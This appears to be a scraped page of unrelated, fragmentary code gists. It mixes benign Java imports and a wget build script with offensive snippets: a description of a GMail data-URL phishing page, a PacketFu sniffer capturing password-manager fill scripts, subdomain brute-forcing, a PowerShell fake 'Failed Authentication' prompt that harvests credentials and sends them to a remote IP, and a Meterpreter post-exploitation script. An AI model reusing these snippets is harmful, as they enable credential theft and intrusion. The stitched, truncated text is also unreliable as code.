| package testng.samples; | |
| import java.util.ArrayList; | |
| import java.util.HashMap; | |
| import java.util.List; | |
| import java.util.Map; | |
| import java.util.Random; | |
| import org.testng.ITestContext; | |
| import org.testng.TestNG; |
| import java.io.BufferedInputStream; | |
| import java.io.IOException; | |
| import java.net.URISyntaxException; | |
| import java.net.URL; | |
| import org.apache.pdfbox.pdfparser.PDFParser; | |
| import org.apache.pdfbox.util.PDFTextStripper; | |
| public class PlayWithPDF { |
| curl -O http://ftp.gnu.org/gnu/wget/wget-1.17.tar.gz | |
| tar -xzf wget-1.17.tar.gz | |
| cd wget-1.17 | |
| ln -s /usr/local/opt/openssl /usr/local/ssl | |
| ./configure --with-ssl=openssl | |
| ./configure --with-ssl=openssl --with-libssl-prefix=/usr/local/ssl | |
| make | |
| sudo make install | |
| wget --help | |
| cd .. && rm -rf wget* |
| // Use Gists to store code you would like to remember later on | |
| console.log(window); // log the "window" object to the console |
The following attack will display a "you've been signed out" page for GMail, and attempt to steal your account credentials.
DO NOT PUT ANY ACCOUNT CREDENTIALS INTO ANY TABS CREATED AFTER VISITING THESE LINKS :)
I received an email in my GMail inbox with a fake attachment image, styled to look like the real GMail attachment UI:
This linked to a page that ended up displaying a fake "you've been signed out" link, via the data:text/html... URL feature of Chrome:
| # Path setting slight of hand: | |
| $: << File.expand_path("../../lib", __FILE__) | |
| require 'packetfu' | |
| require 'json' | |
| capture_thread = Thread.new do | |
| cap = PacketFu::Capture.new(:iface => 'lo0', :start => true) | |
| cap.stream.each do |p| | |
| pkt = PacketFu::Packet.parse p | |
| if pkt.payload.include?("executeFillScript") |
| #!/usr/bin/env ruby | |
| # | |
| ## Brute code stolen form: https://gist.github.com/petehamilton/4755855 | |
| # | |
| def result?(sub) | |
| puts sub | |
| 1 == 2 |
| #!/usr/bin/env ruby | |
| # | |
| ## Brute code stolen form: https://gist.github.com/petehamilton/4755855 | |
| # | |
| @domain = 'contoso.com' | |
| def result?(sub) | |
| results = %x(dig +noall #{sub}.#{@domain} +answer) |
| $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName); | |
| [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; | |
| $wc = new-object net.webclient; | |
| $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy; | |
| $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; | |
| $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, ''); | |
| $result = $wc.downloadstring('https://172.16.102.163'); |
| windows = client.extapi.window.enumerate | |
| windows.each do |winder| | |
| if winder[:title] != 'Default IME' | |
| result = client.railgun.user32.SetWindowTextA(winder[:handle],"Hacked") | |
| end | |
| end |
